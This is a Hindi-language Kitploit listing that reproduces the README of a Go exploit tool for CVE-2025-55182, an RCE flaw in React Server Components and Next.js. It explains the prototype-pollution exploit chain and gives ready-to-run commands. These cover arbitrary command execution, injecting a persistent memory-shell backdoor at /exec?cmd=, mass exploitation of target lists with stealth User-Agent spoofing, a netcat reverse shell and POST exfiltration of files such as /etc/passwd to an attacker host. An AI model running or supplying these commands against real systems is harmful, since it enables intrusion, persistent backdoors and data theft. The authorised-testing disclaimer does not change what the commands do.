Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-golang-PoC — Go-आधारित प्रूफ-ऑफ-कॉन्सेप्ट CVE-2025-55182 के लिए, जो React Server Components में एक गंभीर RCE है। इसमें भेद्यता जाँच, कमांड निष्पादन, मेमोरी शेल इंजेक्शन, रिवर्स शेल, बैच स्कैनिंग, और अधिकृत सुरक्षा परीक्षण के लिए प्रॉक्सी समर्थन शामिल है। | Kitploit
उपकरण/GitHubGitHub/keklick1337/cve-2025-55182-golang-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubkeklick1337/cve-2025-55182-golang-poc

CVE-2025-55182-golang-PoC

Go-आधारित प्रूफ-ऑफ-कॉन्सेप्ट CVE-2025-55182 के लिए, जो React Server Components में एक गंभीर RCE है। इसमें भेद्यता जाँच, कमांड निष्पादन, मेमोरी शेल इंजेक्शन, रिवर्स शेल, बैच स्कैनिंग, और अधिकृत सुरक्षा परीक्षण के लिए प्रॉक्सी समर्थन शामिल है।

रिपॉजिटरी देखेंवेबसाइट
6119 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 React Server Components RCE - Go PoC

⚠️ केवल अधिकृत सुरक्षा परीक्षण के लिए ⚠️

विवरण

CVE-2025-55182 (जिसे CVE-2025-66478 के नाम से भी जाना जाता है) React Server Components (Flight प्रोटोकॉल) में एक गंभीर Remote Code Execution (RCE) भेद्यता है। यह टूल सुरक्षा अनुसंधान और अधिकृत पेनेट्रेशन परीक्षण के लिए PoC का एक Go कार्यान्वयन है।

प्रभावित संस्करण:

  • react-server-dom-webpack: 19.0.0 - 19.2.0
  • Next.js: 15.x (पैच से पहले: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7)
  • Next.js: 16.x (16.0.7 से पहले)
  • Next.js: 14.3.0-canary.77 और बाद के कैनरी संस्करण

भेद्यता विवरण

यह एक्सप्लॉइट Flight प्रोटोकॉल डिसीरियलाइज़ेशन में प्रोटोटाइप पॉल्यूशन का लाभ उठाता है:

  1. Chunk संदर्भ प्राप्त करने के लिए $@ डिसीरियलाइज़ेशन का उपयोग करता है
  2. Chunk.prototype.then को रूट ऑब्जेक्ट के then प्रॉपर्टी के रूप में रखता है
  3. नियंत्रित नकली चंक के साथ initializeModelChunk को कॉल करने के लिए स्टेटस को पर सेट करता है
RESOLVED_MODEL
  • Blob डिसीरियलाइज़ेशन को ट्रिगर करता है जो हमलावर पेलोड के साथ response._formData.get को कॉल करता है
  • मनमाना कोड निष्पादन के लिए response._formData.get को Function कंस्ट्रक्टर पर सेट करता है
  • विशेषताएँ

    • पूर्ण RCE क्षमता - आउटपुट के साथ मनमाने कमांड निष्पादित करें
    • भेद्यता जाँच मोड - एक्सप्लॉइटेशन के बिना सुरक्षित पहचान
    • Next.js संस्करण पहचान - स्वचालित संस्करण फिंगरप्रिंटिंग
    • मेमोरी शेल इंजेक्शन - /exec?cmd= पर स्थायी बैकडोर
    • बैच स्कैनिंग - JSON आउटपुट के साथ मल्टी-थ्रेडेड स्कैनिंग
    • व्यापक प्रॉक्सी समर्थन:
      • प्रमाणीकरण के साथ/बिना SOCKS5
      • SOCKS4/SOCKS4a
      • प्रमाणीकरण के साथ/बिना HTTP/HTTPS प्रॉक्सी
    • स्टील्थ मोड - ब्राउज़र, क्रॉलर, सुरक्षा User-Agent
    • रेट लिमिटिंग - अनुरोधों के बीच कॉन्फ़िगर करने योग्य विलंब
    • रिवर्स शेल - mkfifo + nc (Alpine/busybox पर काम करता है)
    • डेटा एक्सफिल्ट्रेशन - हमलावर सर्वर पर कमांड आउटपुट POST करें
    • क्रॉस-प्लेटफ़ॉर्म बिल्ड - 30+ OS/आर्किटेक्चर संयोजन
    • JSON आउटपुट - स्वचालन के लिए मशीन-पठनीय परिणाम

    इंस्टॉलेशन

    प्री-बिल्ट बाइनरी

    अपने प्लेटफ़ॉर्म के लिए नवीनतम रिलीज़ GitHub Releases से डाउनलोड करें।

    उपलब्ध बाइनरी:

    • Linux: amd64, 386, arm, arm64, mips, mipsle, mips64, riscv64, ppc64, s390x
    • Windows: amd64, 386, arm64
    • macOS: amd64 (Intel), arm64 (Apple Silicon)
    • FreeBSD, OpenBSD, NetBSD: amd64, 386, arm, arm64
    • और भी...

    स्रोत से

    root@kitploit:~
    # Clone repository
    git clone https://github.com/keklick1337/CVE-2025-55182-golang-PoC.git
    cd CVE-2025-55182-golang-PoC
    
    # Build for current platform
    go build -o cve-2025-55182 .
    
    # Or build for all platforms
    chmod +x build.sh
    ./build.sh
    

    स्रोत से बिल्ड करें

    ./build.sh चलाने के बाद, सभी समर्थित प्लेटफ़ॉर्मों के लिए बाइनरी build/ निर्देशिका में उपलब्ध होंगी।

    उपयोग

    मूल कमांड

    root@kitploit:~
    # Check single target for vulnerability
    ./cve-2025-55182 -u http://target:3000 --check
    
    # Detect Next.js version
    ./cve-2025-55182 -u http://target:3000 --version-check
    
    # Execute command with output
    ./cve-2025-55182 -u http://target:3000 -c "id"
    ./cve-2025-55182 -u http://target:3000 -c "cat /etc/passwd"
    

    मेमोरी शेल (स्थायी बैकडोर)

    root@kitploit:~
    # Inject memory shell (checks if already installed first)
    ./cve-2025-55182 -u http://target:3000 --memshell
    
    # Test if memory shell is active
    ./cve-2025-55182 -u http://target:3000 --test-shell
    
    # Execute command via memory shell
    ./cve-2025-55182 -u http://target:3000 --shell-exec "cat /etc/passwd"
    
    # After injection, you can also use curl directly:
    curl 'http://target:3000/exec?cmd=id'
    curl 'http://target:3000/exec?cmd=whoami'
    

    कस्टम हेडर और SSL बाईपास

    root@kitploit:~
    # Add custom headers (can be used multiple times)
    ./cve-2025-55182 -u http://target:3000 --check -H 'Authorization: Bearer token123'
    ./cve-2025-55182 -u http://target:3000 --check -H 'Host: example.com' -H 'X-Forwarded-For: 127.0.0.1'
    
    # Skip SSL certificate verification (for self-signed certs)
    ./cve-2025-55182 -u https://target:3000 --check -k
    ./cve-2025-55182 -u https://target:3000 --check --insecure
    
    # Combine with other options
    ./cve-2025-55182 -u https://target:3000 -c "id" -k -H 'Cookie: session=abc123' --proxy socks5://127.0.0.1:1080
    

    प्रॉक्सी समर्थन

    root@kitploit:~
    # SOCKS5 with authentication
    ./cve-2025-55182 -u http://target:3000 --check --proxy socks5://user:[email protected]:1080
    
    # SOCKS5 without authentication
    ./cve-2025-55182 -u http://target:3000 --check --proxy socks5://127.0.0.1:1080
    
    # SOCKS4 proxy
    ./cve-2025-55182 -u http://target:3000 --check --proxy socks4://127.0.0.1:1080
    
    # HTTP proxy
    ./cve-2025-55182 -u http://target:3000 --check --proxy http://127.0.0.1:8080
    

    बैच स्कैनिंग

    root@kitploit:~
    # Batch check from file
    ./cve-2025-55182 --urls targets.txt --check
    
    # Batch scan with JSON output
    ./cve-2025-55182 --urls targets.txt --check --json -o results.json
    
    # Batch scan with multiple threads and stealth
    ./cve-2025-55182 -f targets.txt --check --threads 20 --stealth crawler --delay 2s
    
    # Save vulnerable targets to file
    ./cve-2025-55182 -f targets.txt --check -o vulnerable.txt
    
    # Batch memory shell injection
    ./cve-2025-55182 --urls targets.txt --memshell --workers 10
    
    # Batch command execution
    ./cve-2025-55182 --urls targets.txt -c "id" --threads 5
    

    नेटवर्क एक्सफिल्ट्रेशन

    root@kitploit:~
    # Reverse shell (mkfifo + nc, works on Alpine)
    ./cve-2025-55182 -u http://target:3000 --revshell 10.0.0.1 4444
    
    # Start listener on attacker machine first:
    nc -lvnp 4444
    
    # Exfiltrate command output via HTTP POST
    ./cve-2025-55182 -u http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444
    
    # Start listener: nc -lvnp 4444
    

    विकल्प

    विकल्पविवरण
    -u, --urlलक्ष्य URL (जैसे, http://localhost:3000)
    -f, --fileलक्ष्य URL वाली फ़ाइल (प्रति पंक्ति एक)
    --urls-f/--file का उपनाम
    -o, --outputभेद्य लक्ष्यों के लिए आउटपुट फ़ाइल
    --jsonपरिणाम JSON प्रारूप में आउटपुट करें
    -c, --commandनिष्पादित करने के लिए कमांड (आउटपुट के साथ)
    --checkभेद्यता की जाँच करें
    --version-checkNext.js संस्करण का पता लगाएं
    --proxyप्रॉक्सी URL (socks5://user:pass@ip:port, socks4://ip:port, http://ip:port)
    -H, --headerकस्टम हेडर (कई बार उपयोग किया जा सकता है)
    -k, --insecureSSL/TLS प्रमाणपत्र सत्यापन छोड़ें
    --stealthस्टील्थ मोड: browser, crawler, security (डिफ़ॉल्ट: browser)
    --delayअनुरोधों के बीच विलंब (जैसे, 2s, 500ms)
    --variantsगहन जाँच के लिए कई पेलोड वेरिएंट का उपयोग करें
    --memshellमेमोरी शेल इंजेक्ट करें (स्थायी बैकडोर)
    --test-shellजाँचें कि मेमोरी शेल सक्रिय है या नहीं
    --shell-execमेमोरी शेल के माध्यम से कमांड निष्पादित करें
    --revshell IP PORTरिवर्स शेल स्थापित करें
    --exfil CMD IP PORTकमांड निष्पादित करें और आउटपुट POST करें
    -t, --timeoutसेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 15)
    --threadsसमवर्ती थ्रेड की संख्या (डिफ़ॉल्ट: 10)

    प्रॉक्सी प्रकार

    root@kitploit:~
    socks5://user:pass@ip:port  - SOCKS5 with authentication
    socks5://ip:port            - SOCKS5 without authentication  
    socks5h://ip:port           - SOCKS5 with remote DNS resolution
    socks4://ip:port            - SOCKS4 proxy
    socks4a://ip:port           - SOCKS4a proxy
    http://user:pass@ip:port    - HTTP proxy with authentication
    http://ip:port              - HTTP proxy without authentication
    https://ip:port             - HTTPS proxy
    

    स्टील्थ मोड

    मोडविवरण
    browserवास्तविक ब्राउज़र अनुरोधों की नकल करता है (Chrome, Firefox, Safari, Edge) - डिफ़ॉल्ट
    crawlerसर्च इंजन क्रॉलर की नकल करता है (Googlebot, Bingbot, Baiduspider, आदि)
    securityसुरक्षा स्कैनर User-Agent का उपयोग करता है (Nessus, Nuclei)

    मेमोरी शेल

    मेमोरी शेल सुविधा एक स्थायी बैकडोर इंजेक्ट करती है जो:

    1. पहले जाँचता है - इंजेक्शन से पहले, सत्यापित करता है कि शेल पहले से इंस्टॉल है या नहीं
    2. http.Server.prototype.emit को हुक करता है - सभी HTTP अनुरोधों को इंटरसेप्ट करता है
    3. /exec एंडपॉइंट बनाता है - cmd क्वेरी पैरामीटर स्वीकार करता है
    4. रीस्टार्ट तक बना रहता है - सर्वर मेमोरी में बना रहता है
    root@kitploit:~
    # After injection:
    curl 'http://target:3000/exec?cmd=id'
    curl 'http://target:3000/exec?cmd=ls+-la'
    curl 'http://target:3000/exec?cmd=cat+/etc/passwd'
    

    प्रोजेक्ट संरचना

    root@kitploit:~
    .
    ├── main.go                   # CLI entry point
    ├── pkg/
    │   ├── colors/
    │   │   └── colors.go         # Terminal colors with --nocolor support
    │   ├── exploit/
    │   │   └── exploit.go        # Core exploit logic, memory shell, version detection
    │   ├── proxy/
    │   │   └── proxy.go          # SOCKS4/5, HTTP proxy support
    │   ├── scanner/
    │   │   └── scanner.go        # Batch scanning with JSON output
    │   └── stealth/
    │       └── stealth.go        # User-Agent randomization
    ├── build.sh                  # Cross-platform build script
    ├── go.mod                    # Go module file
    ├── go.sum                    # Go dependencies
    └── README.md                 # This file
    

    क्रॉस-प्लेटफ़ॉर्म बिल्ड

    build.sh स्क्रिप्ट 30+ प्लेटफ़ॉर्मों के लिए बिल्ड करती है:

    • Linux: amd64, 386, arm, arm64, mips, mipsle, mips64, riscv64, ppc64, s390x
    • Windows: amd64, 386, arm64 (.exe)
    • macOS: amd64 (Intel), arm64 (Apple Silicon)
    • FreeBSD: amd64, 386, arm, arm64
    • OpenBSD: amd64, 386, arm, arm64
    • NetBSD: amd64, 386, arm, arm64
    • DragonFly BSD: amd64
    • Solaris/Illumos: amd64
    • Plan 9: amd64, 386
    • AIX: ppc64
    root@kitploit:~
    chmod +x build.sh
    ./build.sh
    

    JSON आउटपुट प्रारूप

    --json फ़्लैग का उपयोग करने पर, परिणाम JSONL प्रारूप में सहेजे जाते हैं (प्रति पंक्ति एक JSON):

    root@kitploit:~
    {"url":"http://target:3000","vulnerable":true,"version":"15.0.3","checked_at":"2025-12-06T12:00:00Z","response_time_ms":1234}
    

    पूर्ण रिपोर्ट (_report.json) में शामिल है:

    root@kitploit:~
    {
      "scan_time": "2025-12-06T12:00:00Z",
      "total_urls": 100,
      "vulnerable_count": 5,
      "safe_count": 90,
      "timeout_count": 5,
      "results": [...]
    }
    

    संस्करण पहचान

    यह टूल Next.js संस्करण का पता लगा सकता है:

    • X-Powered-By हेडर
    • HTML/JS स्रोत (__NEXT_DATA__, /_next/ पथ)
    • बिल्ड मेनिफेस्ट पैटर्न

    भेद्य संस्करण लाल रंग में हाइलाइट किए जाते हैं।

    अस्वीकरण

    ⚠️ महत्वपूर्ण कानूनी सूचना ⚠️

    यह टूल केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।

    इच्छित उपयोग

    • सुरक्षा अनुसंधान और भेद्यता आकलन
    • लिखित अनुमति के साथ अधिकृत पेनेट्रेशन परीक्षण
    • अपने स्वयं के अनुप्रयोगों और इन्फ्रास्ट्रक्चर का परीक्षण
    • नियंत्रित लैब वातावरण में शैक्षिक प्रदर्शन
    • पैच और सुरक्षा उपाय विकसित करना

    निषिद्ध उपयोग

    इस टूल का उपयोग करना सख्त रूप से निषिद्ध है:

    • उन प्रणालियों के विरुद्ध जिनके स्वामी आप नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित प्राधिकरण नहीं है
    • किसी भी दुर्भावनापूर्ण, अवैध, या अनधिकृत गतिविधियों के लिए
    • कंप्यूटर प्रणालियों या नेटवर्क तक अनधिकृत पहुँच प्राप्त करने के लिए
    • किसी भी लागू स्थानीय, राज्य, राष्ट्रीय, या अंतर्राष्ट्रीय कानूनों के उल्लंघन में
    • बिना प्राधिकरण के प्रणालियों को बाधित, क्षतिग्रस्त, या समझौता करने के लिए

    कानूनी चेतावनी

    कंप्यूटर प्रणालियों तक अनधिकृत पहुँच दुनिया भर के अधिकांश क्षेत्राधिकारों में एक आपराधिक अपराध है, जिसमें निम्न शामिल हैं पर इन्हीं तक सीमित नहीं:

    • 🇺🇸 यूएसए: Computer Fraud and Abuse Act (CFAA) - 20 साल तक की कैद
    • 🇪🇺 यूरोपीय संघ: सूचना प्रणालियों के विरुद्ध हमलों पर निर्देश 2013/40/EU
    • 🇷🇺 रूस: आपराधिक संहिता के अनुच्छेद 272-274
    • 🇬🇧 यूके: Computer Misuse Act 1990
    • 🇩🇪 जर्मनी: §202a-202d StGB
    • 🇨🇳 चीन: आपराधिक कानून के अनुच्छेद 285-287

    कोई वारंटी नहीं

    यह सॉफ़्टवेयर "जैसा है" (AS IS) प्रदान किया गया है, बिना किसी प्रकार की स्पष्ट या निहित वारंटी के। लेखक और कॉपीराइट धारक इस सॉफ़्टवेयर के उपयोग से उत्पन्न किसी भी दावे, क्षति, या अन्य दायित्व के लिए उत्तरदायी नहीं होंगे।

    उपयोगकर्ता की जिम्मेदारी

    इस टूल को डाउनलोड करके, इंस्टॉल करके, या उपयोग करके, आप स्वीकार करते हैं कि:

    1. आप अपने कार्यों के लिए पूर्ण रूप से जिम्मेदार हैं
    2. आप इस टूल का उपयोग केवल उन्हीं प्रणालियों पर करेंगे जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट प्राधिकरण है
    3. आप इस सॉफ़्टवेयर के उपयोग से जुड़े सभी जोखिमों को समझते हैं और स्वीकार करते हैं
    4. लेखक किसी भी दुरुपयोग या हुई क्षति के लिए कोई जिम्मेदारी नहीं लेता है

    यदि आप इन शर्तों से सहमत नहीं हैं, तो इस टूल का उपयोग न करें।

    लेखक

    Vladislav Tislenko aka keklick1337
    दिनांक: 2025-12-05

    लाइसेंस

    यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।


    जिम्मेदारी से उपयोग करें। कानून का पालन करें। 🔐

    टूल डाउनलोड करें
    --workers
    --threads का उपनाम
    --nocolorरंगीन आउटपुट अक्षम करें (Windows/पाइप के लिए)
    -h, --helpसहायता संदेश दिखाएं
    -v, --versionसंस्करण दिखाएं